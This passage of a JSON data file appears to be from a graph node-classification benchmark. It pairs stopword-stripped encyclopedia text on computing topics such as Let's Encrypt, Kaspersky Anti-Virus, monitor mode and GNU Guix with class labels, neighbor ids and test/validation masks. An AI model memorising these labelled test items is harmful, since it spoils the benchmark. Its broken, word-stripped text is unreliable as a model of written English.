    "text": "CopperheadOS:copperheados copperheados source-available operating system smartphones tablet computers based android mobile platform adds privacy security features official releases android open source project google goal upstreaming back android linux openbsd august 2016 copperheados announced future versions operating system based android nougat 7.x would released no-commercial-usage license funding could acquired march 2017 support pixel pixel xl devices launched offer buy devices copperheados preinstalled june 11th 2018 daniel micay main developer copperheados then-chief technology officer 50 stakeholder company announced publicly cut company e-mail sent james donaldson order turn access subreddit micay twitter account mr. donaldson representing company let micay know micay would receive pay signed employment agreement twitter micay wrote mr. donaldson attempting seize micay personal gpg key also used secure key parts copperhead project micay reportedly deleted signing keys required release updates copperheados following list devices supported copperheados past following devices supported",
    "neighbors": [
      2050,
      5637,
      11271,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      3626,
      7722,
      5677,
      7727,
      1083,
      6212,
      69,
      8262,
      4685,
      7246,
      3664,
      7253,
      8280,
      3162,
      8285,
      607,
      2658,
      6763,
      8315,
      8316,
      8829,
      11391,
      1670,
      5262,
      10393,
      7835,
      6301,
      673,
      8870,
      1191,
      3248,
      7857,
      196,
      8907,
      4305,
      2259,
      8413,
      9949,
      1255,
      8423,
      8940,
      5892,
      7428,
      2828,
      4364,
      5397,
      280,
      10009,
      10525,
      798,
      4383,
      288,
      2852,
      8486,
      10537,
      7983,
      3380,
      823,
      5431,
      2875,
      3900,
      10045,
      7492,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      10080,
      3940,
      10599,
      2925,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      5067,
      3542,
      479,
      10215,
      1516,
      5100,
      5613,
      495,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2002,
    "label": 9,
    "text": "LINC_4GL:linc 4gl linc logic information network compiler fourth-generation programming language used mostly unisys computer systems linc originally developed short-cut template two programmers reproduce automate production computer applications different companies similar requirements specifications requirements similar companies followed common generic business model businesses dealt commodities parts suppliers customers named components linc terminology manufactured assembled purchased sold actions termed events linc terminology components events interface specifications ispecs contained database definitions screen designs business rules application system lirc logic information report compiler part linc developed allow programmer produce reports e.g purchase orders invoices credit notes consignment notes bills sale information reports accessed using various user-defined views components events called profiles reports run separate task separate thread execution could also written run background process could put sleep period time woken perform processing put sleep part reason introduction new terminology make system easier programmers isolated lot underlying technology similarly different names intentionally used control structures do.when rather loop look.up determine rather read open close statements generated automatically allowed linc make programmers much efficient application systems produced easier read maintain differentiated simply yet another third generation high level language linc assumption use total reliance facilities available packaged burroughs computer written operating system job control language cobol programming language database management system network definition user terminal etc see also history version 11 character changed linc lirc specifications previously held source-code files held database designed developed using linc 4gl subject rigorous automatic validation new linc-based system specifications stored named linc interactive linc development environment lde extensive reliance terminal screen painting i.e mocking -up crt data-entry screen used assist system definition e.g define component database attributes name length alpha numeric validation rules etc. defining report layouts early 1990s new pc-based tool developing linc specifications released linc development assistant lda lda written mixture smalltalk c++ rather linc 4gl latter intended run personal computer version 17 intended development done lda linc known unisys enterprise application environment eae generate cobol code burroughs sperry mainframes microsoft windows various unix linux platforms also generate gui front-end clients addition compiling generated code deploying databases correspond specification databases supported include burroughs dmsii sperry rdms oracle database microsoft sql server recent update unisys replacing eae unisys agile business suite ab suite ldl language promoted ldl+ new object-oriented features development environment makes use microsoft visual studio ide model driven approach extended uml based class diagram integrated source code solution way round trip update achieved changes business rules result changes uml representation vice versa ab suite 4.0 makes use visual studio 2012 integrates team foundation server 2012 ab suite generates either .net environment clearpath mcp environment ab suite developer write less code traditional c java environment linc originally developed two new zealand computer programmers gil simpson peter hoskins working saudi arabia early 1980s first developed exclusively operation single model burroughs computer system comprising totally integrated system etc linc system created 3rd gl cobol application dmsii database definition ndlii network description wfl job control source code job control statements subsequently run compile elements create integrated system database applications user terminal network burroughs purchased rights sell product 1982 product development retained original inventors early requirement extend product use burroughs mid-range large scale computing platforms burroughs merged sperry corporation form unisys language extended used sperry univac 1100/2200 series machines also subsequently new zealand development centre set christchurch gil simpson develop product ownership later transferred unisys product mainframe computer centre resources transitioned unisys acus australian centre unisys software sydney australia gil simpsons christchurch team went create jade language/database could import run linc code commodity hardware linc supported following platforms development work acus unisys transitioned acus indian outsourcing operation early 2008 eventually product sold 4,000 clients worldwide principally linc fails compete myriad turnkey systems readily available many sources especially ibm cost purchasing customising existing product e.g hogan retail banking system perceived less expensive/risk using linc create scratch entire business system rules weaknesses arise mostly dependence basis burroughs dms cobol differ greatly computing platforms",
    "neighbors": [
      3716,
      6797,
      11030,
      4900,
      10020,
      1702,
      2477,
      5677,
      11059,
      823,
      4410,
      8001,
      4042,
      847,
      5714,
      2533,
      9330,
      5492,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2003,
    "label": 4,
    "text": "Let's_Encrypt:let encrypt let encrypt non-profit certificate authority run internet security research group isrg provides x.509 certificates transport layer security tls encryption charge certificate valid 90 days renewal take place time offer accompanied automated process designed overcome manual creation validation signing installation renewal certificates secure websites launched april 12 2016 project claims goal make encrypted connections world wide web servers ubiquitous eliminating payment web server configuration validation email management certificate renewal tasks meant significantly lower complexity setting maintaining tls encryption linux web server execution two commands sufficient set https encryption acquire install certificates end software package included official debian ubuntu software repositories current initiatives major browser developers mozilla google deprecate unencrypted http counting availability let encrypt project acknowledged potential accomplish encrypted connections default case entire web service issues domain-validated certificates since fully automated organization validation extended validation certificates require human validation registrants therefore offered let encrypt transparent possible hope protect trustworthiness guard attacks manipulation attempts purpose regularly publish transparency reports publicly log acme transactions e.g using certificate transparency use open standards free software much possible support acme v2 wildcard certificates added march 2018 let encrypt service provided internet security research group isrg public benefit organization major sponsors electronic frontier foundation eff mozilla foundation ovh cisco systems facebook google chrome internet society partners include certificate authority identrust university michigan u-m stanford law school linux foundation well stephen kent raytheon/bbn technologies alex polvi coreos june 2015 let encrypt announced generation first rsa root certificate isrg root x1 root certificate used sign two intermediate certificates also cross-signed certificate authority identrust one intermediate certificates used sign issued certificates kept offline backup case problems first intermediate certificate identrust certificate preinstalled major web browsers let encrypt certificates normally validated accepted upon installation even browser vendors include isrg root certificate trust anchor let encrypt developers planned generate ecdsa root certificate well later 2015 pushed back early 2016 2019 challenge–response protocol used automate enrolling certificate authority called automated certificate management environment acme involves various requests web server domain covered certificate based whether resulting responses match expectations control enrollee domain assured domain validation order acme client software sets special tls server server system gets queried acme certificate authority server special requests using server name indication domain validation using server name indication dvsni validation processes run multiple times separate network paths checking dns entries provisioned done multiple geographically diverse locations make dns spoofing attacks harder acme interactions based exchanging json documents https connections draft specification available github version submitted internet engineering task force ietf proposal internet standard certificate authority consists piece software called boulder written go implements server side acme protocol published free software source code terms version 2 mozilla public license mpl provides restful api accessed tls-encrypted channel apache-licensed python certificate management program called certbot formerly letsencrypt gets installed client side web server enrollee used order certificate conduct domain validation process install certificate configure https encryption http server later regularly renew certificate installation agreeing user license executing single command enough get valid certificate installed additional options like ocsp stapling http strict transport security hsts also enabled automatic setup initially works apache nginx let encrypt issues certificates valid 90 days reason given certificates limit damage key compromise mis-issuance encourage automation official certbot client third-party clients allow automation certificate renewal several third-party client implementations several languages created community let encrypt project started 2012 two mozilla employees josh aas eric rescorla together peter eckersley electronic frontier foundation j. alex halderman university michigan internet security research group company behind let encrypt incorporated may 2013 let encrypt announced publicly november 18 2014 january 28 2015 acme protocol officially submitted ietf standardisation april 9 2015 isrg linux foundation declared collaboration root intermediate certificates generated beginning june june 16 2015 final launch schedule service announced first certificate expected issued sometime week july 27 2015 followed limited issuance period test security scalability general availability service originally planned begin sometime week september 14 2015 august 7 2015 launch schedule amended provide time ensuring system security stability first certificate issued week september 7 2015 followed general availability week november 16 2015 cross-signature identrust planned available let encrypt opens public september 14 2015 let encrypt issued first certificate domain day isrg submitted root program applications mozilla microsoft google apple october 19 2015 intermediate certificates became cross-signed identrust causing certificates issued let encrypt trusted major browsers november 12 2015 let encrypt announced general availability would pushed back first public beta would commence december 3 2015 public beta ran december 3 2015 april 12 2016 3.8 million unexpired unrevoked active certificates cover 7 million unique domains part due support large hosting companies",
    "neighbors": [
      517,
      1157,
      138,
      9744,
      1435,
      3237,
      8358,
      8615,
      4011,
      11693,
      6834,
      9394,
      823,
      4797,
      6975,
      2887,
      5834,
      10831,
      11345,
      11221,
      7264,
      865,
      8170,
      8554,
      2034,
      1526,
      119,
      762,
      10622
    ],
    "mask": "Test"
  },
  {
    "node_id": 2004,
    "label": 7,
    "text": "Azure_Stream_Analytics:azure stream analytics microsoft azure stream analytics serverless scalable complex event processing engine microsoft enables users develop run real-time analytics multiple streams data sources devices sensors web sites social media applications users set alerts detect anomalies predict trends trigger necessary workflows certain conditions observed make data available downstream applications services presentation archiving analysis users author real-time analytics using simple declarative sql-like language embedded support temporal logic callouts custom code javascript user defined functions extend streaming logic written sql callouts azure machine learning helps predictive scoring streaming data azure stream analytics serverless job service azure eliminates need infrastructure servers virtual machines managed clusters users processing used running jobs azure stream analytics integrates azure iot hub enable real-time analytics data iot devices applications users build real-time dashboards power bi live command control view real-time dashboards help transform live data actionable insightful visuals stream analytics supports three different types input sources azure event hubs azure iot hubs azure blob storage additionally stream analytics supports azure blob storage input reference data help augment fast moving event data streams static data stream analytics supports wide variety output targets support power bi allows real-time dashboarding event hub service bus topics queues help trigger downstream workflows support azure table storage azure sql databases azure sql data warehouse azure sql document db azure data lake store enable variety downstream analysis archiving capabilities",
    "neighbors": [
      4704,
      5666,
      3462,
      10413,
      1935,
      2641
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2005,
    "label": 4,
    "text": "Kaspersky_Anti-Virus:kaspersky anti-virus kaspersky anti-virus antivirus kasperskovo formerly known antiviral toolkit pro often referred kav antivirus program developed kaspersky lab designed protect users malware primarily designed computers running microsoft windows macos although version linux available business consumers kaspersky anti-virus features include real-time protection detection removal viruses trojans worms spyware adware keyloggers malicious tools auto-dialers well detection removal rootkits also includes instantaneous automatic updates via kaspersky security network service microsoft windows users may download antivirus rescue disk scans host computer booting inside isolated linux environment addition kaspersky anti-virus prevents disabled malware without user permission via password access prompts upon disabling protection elements changing internal settings also scans incoming instant messenger traffic email traffic automatically disables links known malware hosting sites using internet explorer firefox includes free technical support free product upgrades within paid-subscription periods kaspersky anti-virus lacks certain features found kaspersky internet security missing features include personal firewall hips secure keyboard antispam antibanner parental control tools also kaspersky like majority competitors incompatible many anti-virus anti-spyware software 2005 two critical flaws discovered kaspersky anti-virus one could let attackers commandeer systems use one allowed chm files insert malicious code edition kaspersky anti-virus solution linux workstations available business consumers offers many features included mainstream version windows including on-access on-demand scanners specialized editions kaspersky anti-virus also available variety linux servers offer protection forms malware newly released macintosh capable edition kaspersky anti-virus compatible intel processor based mac os x tiger higher include brand new version mac os x snow leopard released august 2009 kaspersky lab internal testing concludes consuming 2 cpu impact performance designed maintain user friendly mac-like interface mac users familiar kaspersky anti-virus mac contains definitions detect block malware affecting windows linux macos alike kaspersky anti-virus mac also scans shared folders users running windows using virtual pc capable apple macintosh personal computers dvd-rom cd-rom drive internet explorer 8 windows installed 3.0 also required installation kaspersky anti-virus windows latest version either downloaded official website purchased retail according av-comparatives kaspersky anti-virus rates highly amongst virus scanners terms detection rates malware removal even despite fact program failed two virus bulletin tests 2007 another two 2008 example latest malware removal test done av-comparatives kaspersky antivirus 2013 awarded highest advanced+ rating able successfully remove 14 malware samples used test following file detection test kaspersky antivirus 2013 also able achieve advanced+ rating 99.2 sample detection rate addition pc world awarded kaspersky anti-virus 6 highest rank 2007 anti-virus comparative well-known highly regarded ars technica lists kaspersky one best choices anti-virus windows platform kaspersky anti-virus a-listed uk pc journal pc pro late 2007 scored highly detection removal malware pc pro attributes “ combination software ’ heuristic scanning uncompromising approach database updates many packages check new virus signatures daily basis kaspersky runs hourly schedule improving chances immunized infection reaches it. ” march 2015 bloomberg accused kaspersky close ties russian military intelligence officials kaspersky slammed claims blog calling coverage sensationalist guilty exploiting paranoia increase readership indicate whether claims true june 2015 united states national security agency united kingdom government communications headquarters said nsa gchq agents broke kaspersky antivirus software could spy people leaks indicate",
    "neighbors": [
      2049,
      10756,
      9746,
      1052,
      550,
      2601,
      6699,
      8753,
      7739,
      9791,
      10308,
      4174,
      2654,
      10872,
      9341,
      127,
      7809,
      131,
      6797,
      10392,
      156,
      2721,
      2213,
      6823,
      3243,
      6834,
      5305,
      704,
      7362,
      10950,
      202,
      7886,
      7887,
      1242,
      224,
      6371,
      6382,
      2811,
      4355,
      5891,
      7948,
      3342,
      4374,
      6431,
      5924,
      1318,
      2859,
      3885,
      7983,
      4403,
      9523,
      823,
      9537,
      3395,
      4421,
      1355,
      10574,
      8024,
      2907,
      7515,
      9055,
      6496,
      9569,
      11622,
      877,
      4464,
      3955,
      1417,
      3981,
      10637,
      11166,
      8614,
      8615,
      4013,
      10166,
      7103,
      1994,
      5069,
      10708,
      5078,
      11225,
      8668,
      9713,
      4595,
      6643,
      2041
    ],
    "mask": "None"
  },
  {
    "node_id": 2006,
    "label": 4,
    "text": "Monitor_mode:monitor mode monitor mode rfmon radio frequency monitor mode allows computer wireless network interface controller wnic monitor traffic received wireless channel unlike promiscuous mode also used packet sniffing monitor mode allows packets captured without associate access point ad hoc network first monitor mode applies wireless networks promiscuous mode used wired wireless networks monitor mode one eight modes 802.11 wireless cards operate master acting access point managed client also known station ad hoc repeater mesh wi-fi direct tdls monitor mode uses monitor mode include geographical packet analysis observing widespread traffic acquiring knowledge wi-fi technology hands-on experience especially useful auditing unsecure channels protected wep monitor mode also used help design wi-fi networks given area channel number wi-fi devices currently used discovered helps create better wi-fi network reduces interference wi-fi devices choosing least used wi-fi channels software kismac kismet combination packet analyzers read pcap files provide user interface passive wireless network monitoring usually wireless adapter unable transmit monitor mode restricted single wireless channel though dependent wireless adapter driver firmware features chipset also monitor mode adapter check see cyclic redundancy check crc values correct packets captured captured packets may corrupted microsoft windows network driver interface specification ndis api supported extensions monitor mode since ndis version 6 first available windows vista ndis 6 supports exposing 802.11 frames upper protocol levels previous versions exposed fake ethernet frames translated 802.11 frames monitor mode support ndis 6 optional feature may may implemented client adapter driver implementation details compliance ndis specifications vary vendor vendor many cases monitor mode support properly implemented vendor example ralink drivers report incorrect dbm readings realtek drivers include trailing 4-byte crc values versions windows prior windows vista packet analyzer applications wildpackets omnipeek tamosoft commview wifi provide device drivers support monitor mode linux interfaces 802.11 drivers support monitor mode many drivers offer support sta drivers ralink broadcom every manufacturer ’ provided driver ’ support monitor mode freebsd netbsd openbsd dragonfly bsd also provide interface 802.11 drivers supports monitor mode many drivers operating systems support monitor mode well mac os x 10.4 later releases drivers airport extreme network adapters allow adapter put monitor mode libpcap 1.0.0 later provides api select monitor mode capturing operating systems",
    "neighbors": [
      9440,
      10329,
      4580,
      10788,
      1064,
      6345,
      842,
      10346,
      6797,
      8909,
      10349,
      1849,
      8922,
      8121,
      10079
    ],
    "mask": "Test"
  },
  {
    "node_id": 2007,
    "label": 4,
    "text": "Mixter:mixter mixter computer security specialist mixter first made transition computer underground large-scale public awareness 2000 time newspapers magazines worldwide mentioned link massively destructive effective distributed denial service ddos attacks crippled shut major websites including yahoo buy.com ebay amazon e-trade msn.com dell zdnet cnn early reports stated fbi-led national infrastructure protection center nipc questioning mixter regarding tool called stacheldraht barbed wire although mixter suspect tool tribal flood network tfn update called tfn2k ultimately discovered ones used attacks causing estimated 1.7 billion usd damages 2002 mixter returned public eye author hacktivismo six/four system six/four system censorship resistant network proxy works using trusted peers relay network connections ssl encrypted links example distribution includes program act web proxy connections hidden reach far end trusted peer",
    "neighbors": [
      9089,
      10914,
      10852,
      10279,
      2409,
      2569,
      1965,
      4725,
      5111,
      1400,
      9214,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 2008,
    "label": 7,
    "text": "FinisTerrae:finisterrae finisterrae 100th supercomputer top500 ranking november 2007 running 12.97 teraflops would rank position 258 list june 2008 also third powerful supercomputer spain marenostrum magerit located galicia project promoted xunta de galicia regional government galicia spanish national research council csic founded 1993 serve platform foster scientific innovation invest research development estimated base project completed 2010 expected reach top10 powerful supercomputers world reaches full capacity supercomputer physically hosted cesga main finisterrae characteristics depicted following table one special characteristics supercomputer ratio cores ram one reason received denomination singular technical scientific installation spanish government denomination given installations value makes singular way installations include canary island grand telescope alba synchrotron even third fastest supercomputer spain projects require special amounts memory held first second supercomputer therefore must executed finisterrae finisterrae supercomputer located cesga integrated system shared-memory nodes smp numa architecture finisterrae composed 144 computational nodes hierarchic storing system main purpose aim supercomputer research supercomputer mainly used three universities located galicia universidade da coruña universidade de santiago de compostela universidade de vigo well research organizations like csic main projects held supercomputer divided four fields",
    "neighbors": [
      3328,
      5384,
      785,
      7699,
      7963,
      6815,
      5798,
      9126,
      6184,
      2345,
      4909,
      7218,
      8501,
      823,
      5948,
      4286,
      2113,
      8514,
      5956,
      4423,
      1480,
      1866,
      8523,
      4308,
      344,
      2264,
      11353,
      731,
      2140,
      11487,
      4194,
      5090,
      7142,
      3960,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 2009,
    "label": 9,
    "text": "Domain-specific_multimodeling:domain-specific multimodeling domain-specific multimodeling software development paradigm view made explicit separate domain-specific language dsl successful development modern enterprise system requires convergence multiple views business analysts domain experts interaction designers database experts developers different kinds expertise take part process building system different work products must managed aligned integrated produce running system every participant development process particular language tailored solve problems specific view system challenge integrating different views avoiding potential cacophony multiple different languages coordination problem domain-specific multimodeling promising compared traditional development paradigms single-language programming general-purpose modeling reap benefits new paradigm must solve coordination problem problem also known fragmentation problem context global model management one proposal solve problem coordination method three-step method overcome obstacles integrating different views coordinating multiple languages method prescribes 1 identify 2 specify references across language boundaries overlaps different languages finally method offers concrete proposals 3 apply knowledge actual development form consistency navigation guidance enterprise systems based multiple domain-specific languages abundant languages metamodel defined extensible markup language xml enjoy particularly widespread adoption illustrate development multiple languages draw example case study apache open business ofbiz system briefly stated ofbiz enterprise resource planning system includes standard components inventory accounting e-commerce etc components implemented mixture xml-based languages regular java code example let us focus content management component particularly use case administrative user creates online web survey shown screenshot refer example create survey example figure shows screenshot administrative interface content management application running ofbiz instance create survey user fills fields input form hits update button creates new survey edited later published frontend website ofbiz behind scenes use case involves several artifacts written different languages example let us focus three languages entity service form dsl three languages correspond roughly structural behavioural user interface concern ofbiz entity dsl used describe underlying data model hence way created survey saved service dsl used describe interface service invoked user hits update button finally form dsl used describe visual appearance form although three languages tailored different things separated entirely user interface invokes certain application logic application logic manipulates data application example non-orthogonal concerns languages overlap concerns represent separated entirely let us examine three languages bottom-up manner point overlaps entity dsl defines structure data ofbiz listing shows definition survey entity business object represents concept survey code listing self-explanatory entity called survey defined 10 fields field name type field surveyid used primary key definition loaded central component ofbiz called entity engine entity engine instantiates corresponding business object purpose entity engine manage transactional properties business objects interact various persistence mechanisms java database connectivity enterprise javabeans even legacy system service dsl specifies interface services ofbiz service encapsulates part application logic system purpose language uniform abstraction various implementing mechanisms individual services implemented java scripting language using rule engine listing shows interface createsurvey service apart name service element specifies location invocation command implementation service default-entity-name attribute specifies service refers survey entity defined previous listing overlap two languages specifically so-called soft reference model service dsl refers model entity dsl reference used two auto-attributes elements specify input output service form typed attributes input service accepts attributes corresponding non-primary key nonpk fields survey entity attributes optional output service returns attributes corresponding primary key pk fields survey i.e. case surveyid field attributes mandatory purpose reference across languages case reduce redundancy attributes createsurvey service corresponds fields survey entity therefore necessary specify form dsl used describe layout visual appearance input forms user interface language consists domain concepts form field listing shows implementation editsurvey form time form dsl overlaps service dsl target attribute form alt-target elements specify input submission form directed either updatesurvey createsurvey services auto-fields-service element specifies form include field corresponding attributes updatesurvey service similar attributes createsurvey service produces similar effect importing definitions another model case auto-attributes elements previous listing see possible customize appearance imported fields isanonymous finally submitbutton added localized title user submit data referenced service create survey example described implemented using models three different languages complete implementation actually involves even languages screen dsl specify layout screen form placed minilang dsl data-manipulation language used implement service however three languages illustrate main idea making concern concrete example also shows simple way reducing redundancy letting languages overlap slightly domain-specific languages like described limited expressiveness often necessary add code snippets general-purpose language like java implement specialized functionality beyond scope languages method called multi-level customization since method commonly used setups multiple languages illustrate continuation example let us call build pdf example suppose want build pdf file survey response online surveys users create building pdf file outside scope languages need write java code invoke third-party pdf library perform specialized functionality two artifacts required first additional service model shown service dsl defines interface concrete service accessed modeling level service model describes location implementation input output attributes second need code snippet shown contains actual implementation service service multiple inputs outputs input java method map called context argument names argument values returns output form another map called results multi-level customization method uses soft references similar create survey example main difference reference model code rather model model advantage case third-party java library building pdfs leveraged another typical application use java code snippets invoke external webservices import results suitable format example illustrates advantages using multiple languages development however also difficulties associated kind development difficulties stem observation kinds artifacts introduce process coordination developer efforts needed refer difficulties coordination problem coordination problem conceptual technical aspect conceptually main problem understand different languages interaction properly design coordinate models multiple languages developers must sufficient understanding languages interact technically main problem enforce consistency tools must provided detect inconsistencies early i.e. modeling time assist developers resolving inconsistencies following examine two aspects greater detail first problem developers encounter starting development multiple languages language cacophony learning different languages understanding interaction necessary make sense complex composition artifacts ofbiz framework instance seventeen different languages 200 000 lines domain-specific language code complexity quite overwhelming currently established method characterizing different languages developers quickly reach operational understanding tools important ad hoc mechanism learning exploration developers typically use tools learn experiments especially three areas tools domain-specific models helpful first understanding language difficult case xml-based domain-specific languages frequent intuitive objection syntax matters objection argument stated following way “ different languages hard understand add confusion xml-based syntax particularly verbose unintelligible using single general-purpose language like java would better developers could rely syntax already know ” objection certainly important misses central point xml similar representation format may syntax developers actually work one advantages using xml-based domain-specific languages provide domain-specific editors figure shows hypothetical editor entity dsl might look like editor presents domain simple visually appealing manner may well use xml representation perhaps layout configuration underneath may complain xml bad choice could also object general-purpose language like java poor choice tasks furthermore developers may feel less intimidated editor figure code listings xml java accept syntax matters use different languages tailored editors becomes reasonable strategy simplicity editor makes language easier understand hence easier use words syntax matters objection may reason explore field domain-specific languages second language interactions reveal relations languages developers able jump related elements different artifacts ease navigation different software artifacts important criterion tools traditional development environments although performed empirical studies area hypothesize proper navigation facilities increase productivity claim supported observation major development environments today offer quite sophisticated navigation facilities type hierarchy browser ability quickly locate jump references method definition development environments provide navigation facilities maintain continuously updated model sourcefiles form abstract syntax tree development environment multiple languages navigation much difficult existing environments geared parsing representing dsl models abstract syntax trees arbitrary perhaps even application-specific languages languages previous example furthermore without internal representation existing environments resolve neither intra- inter-language references languages hence provide useful navigation means developers must maintain conceptual model parts system related new tools navigation facilities geared multiple languages would hand helpful understanding relations languages terms create survey example tools display relations three languages using soft references navigation points third understand language use must able distinguish correct editing operations wrong ones development environment traditional development environments long provided guidance writing program incremental compilation allows environment offer detailed suggestions developer complete statement intrusive kinds guidance also exist syntax-oriented editors input conforming grammar entered generic text-editors parameterized grammar language existed long time existing editors take inter-language consistency relations account providing guidance previous example ideal editor instance able suggest createsurvey service valid value developer edits target attribute form definition environment could reason artifacts different languages would also able help developer identify program states local global consistency situation arise model well-formed hence locally consistent time violates inter-language constraint guidance intelligent assistance form proposals complete model would useful setups multiple languages complex consistency constraints tool-suggested editing operations could make easier developer get started process learning use languages technical aspect coordination problem essentially matter enforcing consistency detect inconsistencies across models multiple languages modeling time fully understand complexity consistency requirements system based multiple languages useful refine concept consistency consistency either intra- inter-consistency intra-consistency concerns consistency elements within single model requirements model must conform metamodel i.e. syntactically well-formed terms create survey example entity model must instance conform xsd schema entity dsl schema metamodel entity dsl specifies elements composed extent valid domains attributes inter-consistency achieved references across language boundaries resolved kind consistency subdivided 1 model-to-model consistency 2 model-to-code consistency model-to-model consistency concerns referential integrity well high-level constraints system create survey example default-entity-name attribute service listing refers name attribute entity listing change one values without updating break reference high-level consistency constraints across different models also exist discussed later project certain patterns conventions naming relating model elements current development environments must tailored specific languages handwritten plugins similar mechanisms order enforce consistency languages previous example model-to-code consistency essential requirement multi-level customization models supplemented code snippets build pdf example necessary check models code actually fit partly matter making sure soft references models code broken similar referential integrity model-to-model consistency also matter making sure code violate expectations set model build pdf example model specifies outbytewrapper always part output i.e. outbytewrapper key put results map analysis code shows outbytewrapper part output exceptions thrown line 10 words possible executions code violate specification modeling level generally state multi-level customization imposes fine-grained constraints involved models code snippets coordination problem arises fact multiple languages used single system two previous subsections illustrate problem conceptual side well low-level technical side challenges described real rather hypothetical challenges specifically faced challenges two concrete representative case studies enterprise resource planning system ofbiz health care system district health information system dhis cases medium-sized systems actual industrial use solution practical problems encountered work systems set guidelines prototypes following introduce overall conceptual framework incorporates guidelines prototypes coherent method coordination method goal coordination method solve coordination problem thereby provide better support development multiple languages properly appreciate method important understand prescribe design individual languages plenty methods tools already proposed method assumes existence setup multiple domain-specific languages given setup one apply method method consists three steps shown diagram step consist couple parts shown little boxes diagram boxes dotted lines represent automatic processes boxes solid lines represent manual ones following explain steps bit detail goal identification step identify language overlaps described example overlap area concerns two languages intersect soft references form dsl service dsl service dsl entity dsl create survey use case examples overlaps another example case customized code snippet used extend model overlaps frequent expressiveness general-purpose languages needed implement specialized requirements beyond scope model identification step either manual automatic process depending complexity overlaps overlaps identified made explicit information used input second step method specification step goal specification step create coordination model specifies languages interact references across language boundaries system constitute coordination model particular system created mapping main software artifacts common representation additional information domain- application-specific constraints may also encoded provide rich representation coordination model based generic information language grammars constraints well application-specific information concrete models application-specific constraints means even though languages used across several products product specification unique coordination model coordination model used basis various forms reasoning final step method application step goal application step take advantage coordination model coordination model allows tools derive three layers useful information first coordination model used enforce consistency across multiple languages coordination model specifies consistency relations elements different languages refer tools enforce referential integrity perform static checks final system deployment second consistency relations used navigate visualize map web different languages development setup information used quickly link relate elements different languages provide traceability among different models third based consistency relations navigational information elements related tools provide guidance specifically completion assistance model completion instance provided generic manner across domain-specific tools coordination method best seen conceptual framework prescribes certain workflow working multiple languages three successive steps constitute workflow supported integrated workbench development environment focus rather extending developer existing environments add support 1 identification 2 specification 3 application main advantage approach developers actually tested work given us feedback kind evaluation method valuable reduces risk solving purely hypothetical problem several papers introduce different steps coordination method report evaluation elaborates technical aspects individual experiment overall results promising significant number errors found production systems given rise constructive dialog developers future tool requirements development process based guidelines supported tools constitutes serious attempt solve coordination problem make domain-specific multimodeling practical proposition",
    "neighbors": [
      10819,
      10628,
      9926,
      7080,
      9780,
      3832,
      3517
    ],
    "mask": "None"
  },
  {
    "node_id": 2010,
    "label": 2,
    "text": "GNU_Guix:gnu guix gnu guix cross-platform package manager tool instantiate manage operating system unix-like operating systems based nix package manager guile scheme apis specializes providing exclusively free software differing traditional package managers guix like nix utilizes purely functional deployment model software installed unique directories generated cryptographic hashes dependencies software included within hash solving problem dependency hell approach package management promises generate reliable reproducible portable packages guix packages defined functional guile scheme apis specifically designed package management dependencies tracked directly language special values called derivations evaluated guix daemon lazily guix keeps track references automatically installed packages garbage collected package depends cost greater storage requirements upgrades guix guaranteed atomic efficiently rolled back also enables multiple users safely install software system without administrator privileges extra storage requirements translates greater bandwidth usage binary substitutes downloaded compared distributions debian user chooses build everything source even larger storage space bandwidth required development gnu guix intertwined guix system guix 1.0 guix system distribution short guixsd complete installable gnu system using linux-libre kernel gnu shepherd init system roll-back feature guix inherited design nix found popular linux distributions debian derivatives arch linux derivatives major distributions fedora centos opensuse project coordinated internet team volunteers incorporated french non-profit guix europe members community features related package management features guix see features guix system inherited design nix content package manager kept directory /gnu/store guix daemon write access achieved via specialised bind mounts store file system mounted read prohibiting interference even root user guix daemon remounts store read/writable private namespace guix talks daemon build things fetch substitutes kept store guix like nix built garbage collection facilities help prune dead store items keep live ones example package definition hello-package written using guile package recipes easily inspected running e.g guix edit hello changed guix making system transparent easily hackable inherited design nix manipulation store items independent directories store begin base32 encoded hash contents dependencies item guix package uses profiles generations collection symlinks specific store items together comprising user installed profile every time package installed removed new generation built e.g profile user installed gnu hello contains links store item holds version hello installed currently used guix e.g version c087a90e06d7b9451f802323e24deb1862a21e0f guix corresponds following item /gnu/store/md2plii4g5sk66wg9cgwc964l3xwhrm9-hello-2.10 built recipe addition symlinks profile guix builds also contains union info-manuals man-pages icons fonts etc user browse documentation access icons fonts installed default symlinks profile generations stored /var/guix filesystem user create number profiles invoking guix package -p profile-name command new directory profile-name well profile-generation-symlinks created current directory guix package enables instantaneous roll-back previous profile generation via changing symlink earlier profile generation profiles also stored store e.g item profile containing hello /gnu/store/b4wipjlsapvnijmbawl7sh76087vpl4n-profile built activated running guix install hello guix environment enables user easily enter environment necessary packages development software present without clogging users default profile dependencies multiple projects e.g running guix environment hello enters throw-away environment everything needed compile hello guix present gcc guile etc. want persistent gc-rooted environment garbage collected next run guix gc create root e.g running guix environment -- root=hello-root hello enters environment everything needed compile guix present gcc guile etc registered root current directory symlinking items store guix pack enables user bundle together store items output docker binary image relocatable tarball squashfs binary guix pack enables user view different graphs packages dependencies guix system distribution abbreviated guixsd linux distribution built around gnu guix package manager enables declarative operating system configuration allows reliable system upgrades easily rolled back uses linux-libre kernel support gnu hurd kernel development february 3 2015 distribution added free software foundation list free linux distributions following cpu architectures supported ia-32 x64 aarch32 aarch64 april 2019 work progress power9 support system services core feature guix system enables user declaratively compose configuration daemons background services easily specify relevant configurations enables user within single configuration file declare whole os e.g tor proxy sshd server webserver serving guix-web via nginx specific port bootup system services ricardo wurmus one maintainers explains extendability like services defined using guile scheme list services continue grow 1.0.0 list services includes following guixsd uses gnu daemon shepherd init system developed tandem guix written guile well previously known dmd stood daemon managing daemons daemons-managing daemon changed names avoid collision digital mars compiler shepherd supplies user-space functionality asynchronously services shepherd generic functions object data types exported use shepherd extend base operating system defined way contrast systemd userspace shepherd process runs user core shepherd model user space initialisation concept extension form composability services designed layered onto services augmenting elaborate specialised behaviours desired expresses instantiation-based dependency relationships found many modern init systems making system modular also allows services interact variadically services arbitrary ways shepherd also provides so-called virtual services allow dynamic dispatch class related service objects instantiate mail transfer agent 